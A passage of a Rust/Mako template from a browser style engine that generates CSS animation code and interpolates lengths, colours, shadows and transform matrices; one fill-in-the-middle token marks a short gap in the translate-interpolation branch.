pub fn each<F: FnMut(TransitionProperty) -> ()>(mut cb: F) {
% for prop in data.longhands:
% if prop.animatable:
cb(TransitionProperty::${prop.camel_case});
% endif
% endfor
}
/// Parse a transition-property value.
pub fn parse(input: &mut Parser) -> Result<Self, ()> {
match_ignore_ascii_case! { try!(input.expect_ident()),
"all" => Ok(TransitionProperty::All),
% for prop in data.longhands:
% if prop.animatable:
"${prop.name}" => Ok(TransitionProperty::${prop.camel_case}),
% endif
% endfor
_ => Err(())
}
}
/// Get a transition property from a property declaration.
pub fn from_declaration(declaration: &PropertyDeclaration) -> Option<Self> {
match *declaration {
% for prop in data.longhands:
% if prop.animatable:
PropertyDeclaration::${prop.camel_case}(..)
=> Some(TransitionProperty::${prop.camel_case}),
% endif
% endfor
_ => None,
}
}
}
impl ToCss for TransitionProperty {
fn to_css<W>(&self, dest: &mut W) -> fmt::Result
where W: fmt::Write,
{
match *self {
TransitionProperty::All => dest.write_str("all"),
% for prop in data.longhands:
% if prop.animatable:
TransitionProperty::${prop.camel_case} => dest.write_str("${prop.name}"),
% endif
% endfor
}
}
}
/// An animated property interpolation between two computed values for that
/// property.
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub enum AnimatedProperty {
% for prop in data.longhands:
% if prop.animatable:
/// ${prop.name}
${prop.camel_case}(longhands::${prop.ident}::computed_value::T,
longhands::${prop.ident}::computed_value::T),
% endif
% endfor
}
impl AnimatedProperty {
/// Get the name of this property.
pub fn name(&self) -> &'static str {
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimatedProperty::${prop.camel_case}(..) => "${prop.name}",
% endif
% endfor
}
}
/// Whether this interpolation does animate, that is, whether the start and
/// end values are different.
pub fn does_animate(&self) -> bool {
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimatedProperty::${prop.camel_case}(ref from, ref to) => from != to,
% endif
% endfor
}
}
/// Whether an animated property has the same end value as another.
pub fn has_the_same_end_value_as(&self, other: &Self) -> bool {
match (self, other) {
% for prop in data.longhands:
% if prop.animatable:
(&AnimatedProperty::${prop.camel_case}(_, ref this_end_value),
&AnimatedProperty::${prop.camel_case}(_, ref other_end_value)) => {
this_end_value == other_end_value
}
% endif
% endfor
_ => false,
}
}
/// Update `style` with the proper computed style corresponding to this
/// animation at `progress`.
pub fn update(&self, style: &mut ComputedValues, progress: f64) {
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimatedProperty::${prop.camel_case}(ref from, ref to) => {
if let Ok(value) = from.interpolate(to, progress) {
style.mutate_${prop.style_struct.ident.strip("_")}().set_${prop.ident}(value);
}
}
% endif
% endfor
}
}
/// Get an animatable value from a transition-property, an old style, and a
/// new style.
pub fn from_transition_property(transition_property: &TransitionProperty,
old_style: &ComputedValues,
new_style: &ComputedValues)
-> AnimatedProperty {
match *transition_property {
TransitionProperty::All => panic!("Can't use TransitionProperty::All here."),
% for prop in data.longhands:
% if prop.animatable:
TransitionProperty::${prop.camel_case} => {
AnimatedProperty::${prop.camel_case}(
old_style.get_${prop.style_struct.ident.strip("_")}().clone_${prop.ident}(),
new_style.get_${prop.style_struct.ident.strip("_")}().clone_${prop.ident}())
}
% endif
% endfor
}
}
}
% if product == "gecko":
use gecko_bindings::structs::RawServoAnimationValue;
use gecko_bindings::sugar::ownership::{HasArcFFI, HasFFI};
unsafe impl HasFFI for AnimationValue {
type FFIType = RawServoAnimationValue;
}
unsafe impl HasArcFFI for AnimationValue {}
% endif
/// An enum to represent a single computed value belonging to an animated
/// property in order to be interpolated with another one. When interpolating,
/// both values need to belong to the same property.
///
/// This is different to AnimatedProperty in the sense that AnimatedProperty
/// also knows the final value to be used during the animation.
///
/// This is to be used in Gecko integration code.
///
/// FIXME: We need to add a path for custom properties, but that's trivial after
/// this (is a similar path to that of PropertyDeclaration).
#[derive(Clone, Debug, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub enum AnimationValue {
% for prop in data.longhands:
% if prop.animatable:
/// ${prop.name}
${prop.camel_case}(longhands::${prop.ident}::computed_value::T),
% endif
% endfor
}
impl AnimationValue {
/// "Uncompute" this animation value in order to be used inside the CSS
/// cascade.
pub fn uncompute(&self) -> PropertyDeclaration {
use properties::{longhands, DeclaredValue};
match *self {
% for prop in data.longhands:
% if prop.animatable:
AnimationValue::${prop.camel_case}(ref from) => {
PropertyDeclaration::${prop.camel_case}(
DeclaredValue::Value(
longhands::${prop.ident}::SpecifiedValue::from_computed_value(from)))
}
% endif
% endfor
}
}
/// Construct an AnimationValue from a property declaration
pub fn from_declaration(decl: &PropertyDeclaration, context: &Context, initial: &ComputedValues) -> Option<Self> {
match *decl {
% for prop in data.longhands:
% if prop.animatable:
PropertyDeclaration::${prop.camel_case}(ref val) => {
let computed = match *val {
// https://bugzilla.mozilla.org/show_bug.cgi?id=1326131
DeclaredValue::WithVariables{..} => unimplemented!(),
DeclaredValue::Value(ref val) => val.to_computed_value(context),
% if not prop.style_struct.inherited:
DeclaredValue::Unset |
% endif
DeclaredValue::Initial => {
let initial_struct = initial.get_${prop.style_struct.name_lower}();
initial_struct.clone_${prop.ident}()
},
% if prop.style_struct.inherited:
DeclaredValue::Unset |
% endif
DeclaredValue::Inherit => {
let inherit_struct = context.inherited_style
.get_${prop.style_struct.name_lower}();
inherit_struct.clone_${prop.ident}()
},
};
Some(AnimationValue::${prop.camel_case}(computed))
}
% endif
% endfor
_ => None // non animatable properties will get included because of shorthands. ignore.
}
}
}
impl Interpolate for AnimationValue {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (self, other) {
% for prop in data.longhands:
% if prop.animatable:
(&AnimationValue::${prop.camel_case}(ref from),
&AnimationValue::${prop.camel_case}(ref to)) => {
from.interpolate(to, progress).map(AnimationValue::${prop.camel_case})
}
% endif
% endfor
_ => {
panic!("Expected interpolation of computed values of the same \
property, got: {:?}, {:?}", self, other);
}
}
}
}
/// A trait used to implement [interpolation][interpolated-types].
///
/// [interpolated-types]: https://drafts.csswg.org/css-transitions/#interpolated-types
pub trait Interpolate: Sized {
/// Interpolate a value with another for a given property.
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()>;
}
/// https://drafts.csswg.org/css-transitions/#animtype-repeatable-list
pub trait RepeatableListInterpolate: Interpolate {}
impl<T: RepeatableListInterpolate> Interpolate for Vec<T> {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
use num_integer::lcm;
let len = lcm(self.len(), other.len());
self.iter().cycle().zip(other.iter().cycle()).take(len).map(|(me, you)| {
me.interpolate(you, progress)
}).collect()
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for Au {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Au((self.0 as f64 + (other.0 as f64 - self.0 as f64) * progress).round() as i32))
}
}
impl <T> Interpolate for Option<T>
where T: Interpolate,
{
#[inline]
fn interpolate(&self, other: &Option<T>, progress: f64) -> Result<Option<T>, ()> {
match (self, other) {
(&Some(ref this), &Some(ref other)) => {
Ok(this.interpolate(other, progress).ok())
}
_ => Err(()),
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for f32 {
#[inline]
fn interpolate(&self, other: &f32, progress: f64) -> Result<Self, ()> {
Ok(((*self as f64) + ((*other as f64) - (*self as f64)) * progress) as f32)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for f64 {
#[inline]
fn interpolate(&self, other: &f64, progress: f64) -> Result<Self, ()> {
Ok(*self + (*other - *self) * progress)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for i32 {
#[inline]
fn interpolate(&self, other: &i32, progress: f64) -> Result<Self, ()> {
let a = *self as f64;
let b = *other as f64;
Ok((a + (b - a) * progress).round() as i32)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
impl Interpolate for Angle {
#[inline]
fn interpolate(&self, other: &Angle, progress: f64) -> Result<Self, ()> {
self.radians().interpolate(&other.radians(), progress).map(Angle)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-visibility
impl Interpolate for Visibility {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(Visibility::visible, _) | (_, Visibility::visible) => {
Ok(if progress >= 0.0 && progress <= 1.0 {
Visibility::visible
} else if progress < 0.0 {
*self
} else {
*other
})
}
_ => Err(()),
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-integer
impl Interpolate for ZIndex {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(ZIndex::Number(ref this),
ZIndex::Number(ref other)) => {
this.interpolate(other, progress).map(ZIndex::Number)
}
_ => Err(()),
}
}
}
impl<T: Interpolate + Copy> Interpolate for Size2D<T> {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let width = try!(self.width.interpolate(&other.width, progress));
let height = try!(self.height.interpolate(&other.height, progress));
Ok(Size2D::new(width, height))
}
}
impl<T: Interpolate + Copy> Interpolate for Point2D<T> {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let x = try!(self.x.interpolate(&other.x, progress));
let y = try!(self.y.interpolate(&other.y, progress));
Ok(Point2D::new(x, y))
}
}
impl Interpolate for BorderRadiusSize {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
self.0.interpolate(&other.0, progress).map(BorderRadiusSize)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-length
impl Interpolate for VerticalAlign {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(VerticalAlign::LengthOrPercentage(LengthOrPercentage::Length(ref this)),
VerticalAlign::LengthOrPercentage(LengthOrPercentage::Length(ref other))) => {
this.interpolate(other, progress).map(|value| {
VerticalAlign::LengthOrPercentage(LengthOrPercentage::Length(value))
})
}
_ => Err(()),
}
}
}
impl Interpolate for BackgroundSize {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
self.0.interpolate(&other.0, progress).map(BackgroundSize)
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-color
impl Interpolate for RGBA {
#[inline]
fn interpolate(&self, other: &RGBA, progress: f64) -> Result<Self, ()> {
fn clamp(val: f32) -> f32 {
val.max(0.).min(1.)
}
let alpha = clamp(try!(self.alpha.interpolate(&other.alpha, progress)));
if alpha == 0. {
Ok(RGBA { red: 0., green: 0., blue: 0., alpha: 0. })
} else {
Ok(RGBA { red: clamp(try!((self.red * self.alpha).interpolate(&(other.red * other.alpha), progress))
* 1. / alpha),
green: clamp(try!((self.green * self.alpha).interpolate(&(other.green * other.alpha), progress))
* 1. / alpha),
blue: clamp(try!((self.blue * self.alpha).interpolate(&(other.blue * other.alpha), progress))
* 1. / alpha),
alpha: alpha
})
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-color
impl Interpolate for CSSParserColor {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(CSSParserColor::RGBA(ref this), CSSParserColor::RGBA(ref other)) => {
this.interpolate(other, progress).map(CSSParserColor::RGBA)
}
_ => Err(()),
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for CalcLengthOrPercentage {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
fn interpolate_half<T>(this: Option<T>,
other: Option<T>,
progress: f64)
-> Result<Option<T>, ()>
where T: Default + Interpolate,
{
match (this, other) {
(None, None) => Ok(None),
(this, other) => {
let this = this.unwrap_or(T::default());
let other = other.unwrap_or(T::default());
this.interpolate(&other, progress).map(Some)
}
}
}
Ok(CalcLengthOrPercentage {
length: try!(self.length.interpolate(&other.length, progress)),
percentage: try!(interpolate_half(self.percentage, other.percentage, progress)),
})
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for LengthOrPercentage {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LengthOrPercentage::Length(ref this),
LengthOrPercentage::Length(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentage::Length)
}
(LengthOrPercentage::Percentage(ref this),
LengthOrPercentage::Percentage(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentage::Percentage)
}
(this, other) => {
let this: CalcLengthOrPercentage = From::from(this);
let other: CalcLengthOrPercentage = From::from(other);
this.interpolate(&other, progress)
.map(LengthOrPercentage::Calc)
}
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for LengthOrPercentageOrAuto {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LengthOrPercentageOrAuto::Length(ref this),
LengthOrPercentageOrAuto::Length(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrAuto::Length)
}
(LengthOrPercentageOrAuto::Percentage(ref this),
LengthOrPercentageOrAuto::Percentage(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrAuto::Percentage)
}
(LengthOrPercentageOrAuto::Auto, LengthOrPercentageOrAuto::Auto) => {
Ok(LengthOrPercentageOrAuto::Auto)
}
(this, other) => {
let this: Option<CalcLengthOrPercentage> = From::from(this);
let other: Option<CalcLengthOrPercentage> = From::from(other);
match this.interpolate(&other, progress) {
Ok(Some(result)) => Ok(LengthOrPercentageOrAuto::Calc(result)),
_ => Err(()),
}
}
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-lpcalc
impl Interpolate for LengthOrPercentageOrNone {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LengthOrPercentageOrNone::Length(ref this),
LengthOrPercentageOrNone::Length(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrNone::Length)
}
(LengthOrPercentageOrNone::Percentage(ref this),
LengthOrPercentageOrNone::Percentage(ref other)) => {
this.interpolate(other, progress).map(LengthOrPercentageOrNone::Percentage)
}
(LengthOrPercentageOrNone::None, LengthOrPercentageOrNone::None) => {
Ok(LengthOrPercentageOrNone::None)
}
_ => Err(())
}
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-number
/// https://drafts.csswg.org/css-transitions/#animtype-length
impl Interpolate for LineHeight {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(LineHeight::Length(ref this),
LineHeight::Length(ref other)) => {
this.interpolate(other, progress).map(LineHeight::Length)
}
(LineHeight::Number(ref this),
LineHeight::Number(ref other)) => {
this.interpolate(other, progress).map(LineHeight::Number)
}
(LineHeight::Normal, LineHeight::Normal) => {
Ok(LineHeight::Normal)
}
_ => Err(()),
}
}
}
/// http://dev.w3.org/csswg/css-transitions/#animtype-font-weight
impl Interpolate for FontWeight {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let a = (*self as u32) as f64;
let b = (*other as u32) as f64;
let weight = a + (b - a) * progress;
Ok(if weight < 150. {
FontWeight::Weight100
} else if weight < 250. {
FontWeight::Weight200
} else if weight < 350. {
FontWeight::Weight300
} else if weight < 450. {
FontWeight::Weight400
} else if weight < 550. {
FontWeight::Weight500
} else if weight < 650. {
FontWeight::Weight600
} else if weight < 750. {
FontWeight::Weight700
} else if weight < 850. {
FontWeight::Weight800
} else {
FontWeight::Weight900
})
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Interpolate for Position {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Position {
horizontal: try!(self.horizontal.interpolate(&other.horizontal, progress)),
vertical: try!(self.vertical.interpolate(&other.vertical, progress)),
})
}
}
impl RepeatableListInterpolate for Position {}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Interpolate for HorizontalPosition {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(HorizontalPosition(try!(self.0.interpolate(&other.0, progress))))
}
}
impl RepeatableListInterpolate for HorizontalPosition {}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Interpolate for VerticalPosition {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(VerticalPosition(try!(self.0.interpolate(&other.0, progress))))
}
}
impl RepeatableListInterpolate for VerticalPosition {}
impl Interpolate for BackgroundPositionX {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(BackgroundPositionX(try!(self.0.interpolate(&other.0, progress))))
}
}
impl Interpolate for BackgroundPositionY {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(BackgroundPositionY(try!(self.0.interpolate(&other.0, progress))))
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-shadow-list
impl Interpolate for TextShadow {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(TextShadow {
offset_x: try!(self.offset_x.interpolate(&other.offset_x, progress)),
offset_y: try!(self.offset_y.interpolate(&other.offset_y, progress)),
blur_radius: try!(self.blur_radius.interpolate(&other.blur_radius, progress)),
color: try!(self.color.interpolate(&other.color, progress)),
})
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-shadow-list
impl Interpolate for TextShadowList {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
let zero = TextShadow {
offset_x: Au(0),
offset_y: Au(0),
blur_radius: Au(0),
color: CSSParserColor::RGBA(RGBA {
red: 0.0, green: 0.0, blue: 0.0, alpha: 0.0
})
};
let max_len = cmp::max(self.0.len(), other.0.len());
let mut result = Vec::with_capacity(max_len);
for i in 0..max_len {
let shadow = match (self.0.get(i), other.0.get(i)) {
(Some(shadow), Some(other))
=> try!(shadow.interpolate(other, progress)),
(Some(shadow), None) => {
shadow.interpolate(&zero, progress).unwrap()
}
(None, Some(shadow)) => {
zero.interpolate(&shadow, progress).unwrap()
}
(None, None) => unreachable!(),
};
result.push(shadow);
}
Ok(TextShadowList(result))
}
}
impl Interpolate for BoxShadowList {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
// The inset value must change
let mut zero = BoxShadow {
offset_x: Au(0),
offset_y: Au(0),
spread_radius: Au(0),
blur_radius: Au(0),
color: CSSParserColor::RGBA(RGBA {
red: 0.0, green: 0.0, blue: 0.0, alpha: 0.0
}),
inset: false,
};
let max_len = cmp::max(self.0.len(), other.0.len());
let mut result = Vec::with_capacity(max_len);
for i in 0..max_len {
let shadow = match (self.0.get(i), other.0.get(i)) {
(Some(shadow), Some(other))
=> try!(shadow.interpolate(other, progress)),
(Some(shadow), None) => {
zero.inset = shadow.inset;
shadow.interpolate(&zero, progress).unwrap()
}
(None, Some(shadow)) => {
zero.inset = shadow.inset;
zero.interpolate(&shadow, progress).unwrap()
}
(None, None) => unreachable!(),
};
result.push(shadow);
}
Ok(BoxShadowList(result))
}
}
/// https://drafts.csswg.org/css-transitions/#animtype-shadow-list
impl Interpolate for BoxShadow {
#[inline]
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
if self.inset != other.inset {
return Err(());
}
let x = try!(self.offset_x.interpolate(&other.offset_x, progress));
let y = try!(self.offset_y.interpolate(&other.offset_y, progress));
let color = try!(self.color.interpolate(&other.color, progress));
let spread = try!(self.spread_radius.interpolate(&other.spread_radius, progress));
let blur = try!(self.blur_radius.interpolate(&other.blur_radius, progress));
Ok(BoxShadow {
offset_x: x,
offset_y: y,
blur_radius: blur,
spread_radius: spread,
color: color,
inset: self.inset,
})
}
}
impl Interpolate for LengthOrNone {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
match (*self, *other) {
(Either::First(ref length), Either::First(ref other)) =>
length.interpolate(&other, progress).map(Either::First),
_ => Err(()),
}
}
}
% if product == "servo":
use properties::longhands::transform::computed_value::ComputedMatrix;
use properties::longhands::transform::computed_value::ComputedOperation as TransformOperation;
use properties::longhands::transform::computed_value::T as TransformList;
use values::CSSFloat;
use values::specified::Angle as SpecifiedAngle;
/// Check if it's possible to do a direct numerical interpolation
/// between these two transform lists.
/// http://dev.w3.org/csswg/css-transforms/#transform-transform-animation
fn can_interpolate_list(from_list: &[TransformOperation],
to_list: &[TransformOperation]) -> bool {
// Lists must be equal length
if from_list.len() != to_list.len() {
return false;
}
// Each transform operation must match primitive type in other list
for (from, to) in from_list.iter().zip(to_list) {
match (from, to) {
(&TransformOperation::Matrix(..), &TransformOperation::Matrix(..)) |
(&TransformOperation::Skew(..), &TransformOperation::Skew(..)) |
(&TransformOperation::Translate(..), &TransformOperation::Translate(..)) |
(&TransformOperation::Scale(..), &TransformOperation::Scale(..)) |
(&TransformOperation::Rotate(..), &TransformOperation::Rotate(..)) |
(&TransformOperation::Perspective(..), &TransformOperation::Perspective(..)) => {}
_ => {
return false;
}
}
}
true
}
/// Build an equivalent 'identity transform function list' based
/// on an existing transform list.
/// http://dev.w3.org/csswg/css-transforms/#none-transform-animation
fn build_identity_transform_list(list: &[TransformOperation]) -> Vec<TransformOperation> {
let mut result = vec!();
for operation in list {
match *operation {
TransformOperation::Matrix(..) => {
let identity = ComputedMatrix::identity();
result.push(TransformOperation::Matrix(identity));
}
TransformOperation::Skew(..) => {
result.push(TransformOperation::Skew(Angle(0.0), Angle(0.0)));
}
TransformOperation::Translate(..) => {
result.push(TransformOperation::Translate(LengthOrPercentage::zero(),
LengthOrPercentage::zero(),
Au(0)));
}
TransformOperation::Scale(..) => {
result.push(TransformOperation::Scale(1.0, 1.0, 1.0));
}
TransformOperation::Rotate(..) => {
result.push(TransformOperation::Rotate(0.0, 0.0, 1.0, Angle(0.0)));
}
TransformOperation::Perspective(..) => {
// http://dev.w3.org/csswg/css-transforms/#identity-transform-function
let identity = ComputedMatrix::identity();
result.push(TransformOperation::Matrix(identity));
}
}
}
result
}
/// Interpolate two transform lists.
/// http://dev.w3.org/csswg/css-transforms/#interpolation-of-transforms
fn interpolate_transform_list(from_list: &[TransformOperation],
to_list: &[TransformOperation],
progress: f64) -> TransformList {
let mut result = vec![];
if can_interpolate_list(from_list, to_list) {
for (from, to) in from_list.iter().zip(to_list) {
match (from, to) {
(&TransformOperation::Matrix(from),
&TransformOperation::Matrix(_to)) => {
let interpolated = from.interpolate(&_to, progress).unwrap();
result.push(TransformOperation::Matrix(interpolated));
}
(&TransformOperation::Skew(fx, fy),
&TransformOperation::Skew(tx, ty)) => {
let ix = fx.interpolate(&tx, progress).unwrap();
let iy = fy.interpolate(&ty, progress).unwrap();
result.push(TransformOperation::Skew(ix, iy));
}
(&TransformOperation::Translate(fx, fy, fz),
&TransformOperation::Translate(tx, ty, tz)) => {
let ix = fx.interpolate(&tx, progress).unwrap();
let iy = fy.interpolate(&ty, progress).unwrap();<|fim▁hole|> }
(&TransformOperation::Scale(fx, fy, fz),
&TransformOperation::Scale(tx, ty, tz)) => {
let ix = fx.interpolate(&tx, progress).unwrap();
let iy = fy.interpolate(&ty, progress).unwrap();
let iz = fz.interpolate(&tz, progress).unwrap();
result.push(TransformOperation::Scale(ix, iy, iz));
}
(&TransformOperation::Rotate(fx, fy, fz, fa),
&TransformOperation::Rotate(tx, ty, tz, ta)) => {
let norm_f = ((fx * fx) + (fy * fy) + (fz * fz)).sqrt();
let norm_t = ((tx * tx) + (ty * ty) + (tz * tz)).sqrt();
let (fx, fy, fz) = (fx / norm_f, fy / norm_f, fz / norm_f);
let (tx, ty, tz) = (tx / norm_t, ty / norm_t, tz / norm_t);
if fx == tx && fy == ty && fz == tz {
let ia = fa.interpolate(&ta, progress).unwrap();
result.push(TransformOperation::Rotate(fx, fy, fz, ia));
} else {
let matrix_f = rotate_to_matrix(fx, fy, fz, fa);
let matrix_t = rotate_to_matrix(tx, ty, tz, ta);
let interpolated = matrix_f.interpolate(&matrix_t, progress).unwrap();
result.push(TransformOperation::Matrix(interpolated));
}
}
(&TransformOperation::Perspective(fd),
&TransformOperation::Perspective(_td)) => {
let mut fd_matrix = ComputedMatrix::identity();
let mut td_matrix = ComputedMatrix::identity();
fd_matrix.m43 = -1. / fd.to_f32_px();
td_matrix.m43 = -1. / _td.to_f32_px();
let interpolated = fd_matrix.interpolate(&td_matrix, progress).unwrap();
result.push(TransformOperation::Matrix(interpolated));
}
_ => {
// This should be unreachable due to the can_interpolate_list() call.
unreachable!();
}
}
}
} else {
// TODO(gw): Implement matrix decomposition and interpolation
result.extend_from_slice(from_list);
}
TransformList(Some(result))
}
/// https://drafts.csswg.org/css-transforms/#Rotate3dDefined
fn rotate_to_matrix(x: f32, y: f32, z: f32, a: SpecifiedAngle) -> ComputedMatrix {
let half_rad = a.radians() / 2.0;
let sc = (half_rad).sin() * (half_rad).cos();
let sq = (half_rad).sin().powi(2);
ComputedMatrix {
m11: 1.0 - 2.0 * (y * y + z * z) * sq,
m12: 2.0 * (x * y * sq - z * sc),
m13: 2.0 * (x * z * sq + y * sc),
m14: 0.0,
m21: 2.0 * (x * y * sq + z * sc),
m22: 1.0 - 2.0 * (x * x + z * z) * sq,
m23: 2.0 * (y * z * sq - x * sc),
m24: 0.0,
m31: 2.0 * (x * z * sq - y * sc),
m32: 2.0 * (y * z * sq + x * sc),
m33: 1.0 - 2.0 * (x * x + y * y) * sq,
m34: 0.0,
m41: 0.0,
m42: 0.0,
m43: 0.0,
m44: 1.0
}
}
/// A 2d matrix for interpolation.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
#[allow(missing_docs)]
pub struct InnerMatrix2D {
pub m11: CSSFloat, pub m12: CSSFloat,
pub m21: CSSFloat, pub m22: CSSFloat,
}
/// A 2d translation function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Translate2D(f32, f32);
/// A 2d scale function.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct Scale2D(f32, f32);
/// A decomposed 2d matrix.
#[derive(Clone, Copy, Debug)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct MatrixDecomposed2D {
/// The translation function.
pub translate: Translate2D,
/// The scale function.
pub scale: Scale2D,
/// The rotation angle.
pub angle: f32,
/// The inner matrix.
pub matrix: InnerMatrix2D,
}
impl Interpolate for InnerMatrix2D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(InnerMatrix2D {
m11: try!(self.m11.interpolate(&other.m11, progress)),
m12: try!(self.m12.interpolate(&other.m12, progress)),
m21: try!(self.m21.interpolate(&other.m21, progress)),
m22: try!(self.m22.interpolate(&other.m22, progress)),
})
}
}
impl Interpolate for Translate2D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Translate2D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress))
))
}
}
impl Interpolate for Scale2D {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
Ok(Scale2D(
try!(self.0.interpolate(&other.0, progress)),
try!(self.1.interpolate(&other.1, progress))
))
}
}
impl Interpolate for MatrixDecomposed2D {
/// https://drafts.csswg.org/css-transforms/#interpolation-of-decomposed-2d-matrix-values
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
// If x-axis of one is flipped, and y-axis of the other,
// convert to an unflipped rotation.
let mut scale = self.scale;
let mut angle = self.angle;
let mut other_angle = other.angle;
if (scale.0 < 0.0 && other.scale.1 < 0.0) || (scale.1 < 0.0 && other.scale.0 < 0.0) {
scale.0 = -scale.0;
scale.1 = -scale.1;
angle += if angle < 0.0 {180.} else {-180.};
}
// Don't rotate the long way around.
if angle == 0.0 {
angle = 360.
}
if other_angle == 0.0 {
other_angle = 360.
}
if (angle - other_angle).abs() > 180. {
if angle > other_angle {
angle -= 360.
}
else{
other_angle -= 360.
}
}
// Interpolate all values.
let translate = try!(self.translate.interpolate(&other.translate, progress));
let scale = try!(scale.interpolate(&other.scale, progress));
let angle = try!(angle.interpolate(&other_angle, progress));
let matrix = try!(self.matrix.interpolate(&other.matrix, progress));
Ok(MatrixDecomposed2D {
translate: translate,
scale: scale,
angle: angle,
matrix: matrix,
})
}
}
impl Interpolate for ComputedMatrix {
fn interpolate(&self, other: &Self, progress: f64) -> Result<Self, ()> {
if self.is_3d() || other.is_3d() {
let decomposed_from = decompose_3d_matrix(*self);
let decomposed_to = decompose_3d_matrix(*other);
match (decomposed_from, decomposed_to) {
(Ok(from), Ok(to)) => {
let interpolated = try!(from.interpolate(&to, progress));
Ok(ComputedMatrix::from(interpolated))
},
_ => {
let interpolated = if progress < 0.5 {*self} else {*other};
Ok(interpolated)
}
}
} else {
let decomposed_from = MatrixDecomposed2D::from(*self);
let decomposed_to = MatrixDecomposed2D::from(*other);
let interpolated = try!(decomposed_from.interpolate(&decomposed_to, progress));
Ok(ComputedMatrix::from(interpolated))
}
}
}
impl From<ComputedMatrix> for MatrixDecomposed2D {
/// Decompose a 2D matrix.
/// https://drafts.csswg.org/css-transforms/#decomposing-a-2d-matrix
fn from(matrix: ComputedMatrix) -> MatrixDecomposed2D {
let mut row0x = matrix.m11;
let mut row0y = matrix.m12;
let mut row1x = matrix.m21;
let mut row1y = matrix.m22;
let translate = Translate2D(matrix.m41, matrix.m42);
let mut scale = Scale2D((row0x * row0x + row0y * row0y).sqrt(),
(row1x * row1x + row1y * row1y).sqrt());
// If determinant is negative, one axis was flipped.
let determinant = row0x * row1y - row0y * row1x;
if determinant < 0. {
if row0x < row1y {
scale.0 = -scale.0;
} else {
